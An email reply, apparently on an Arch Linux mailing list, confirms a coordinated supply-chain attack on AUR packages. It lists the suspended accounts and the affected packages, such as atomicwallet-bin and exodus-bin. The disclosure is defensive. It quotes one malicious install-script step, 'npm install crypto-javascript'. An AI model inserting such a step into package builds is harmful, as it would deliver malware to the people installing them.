Hi Soufiane,
On 5/19/26 1:29 AM, Fariss, Soufiane wrote:
> Flagging an active coordinated supply-chain attack against the AUR
> observed on *2026-05-16 / 2026-05-17*. Three packages were adopted by
> three single-package burner accounts using |@onionmail.org| addresses,
> and the very first commit on each pushed an identical payload.
Thanks for bringing this to our attention, we are suspending the
concerned accounts and reverting the changes.
I've found quite a few additional candidates with a variant (running
"npm install crypto-javascript" in a new install script), pushed at the
same time.
Accounts:
* pierrethomas
* damienlebond
Packages:
* gnome-vfs
* expressvpn
* atomicwallet-bin
* exodus-bin
This is a not so kind remember to not trust blindly AUR packages and to
verify before building/installing updates...
Best,
Hyacinthe
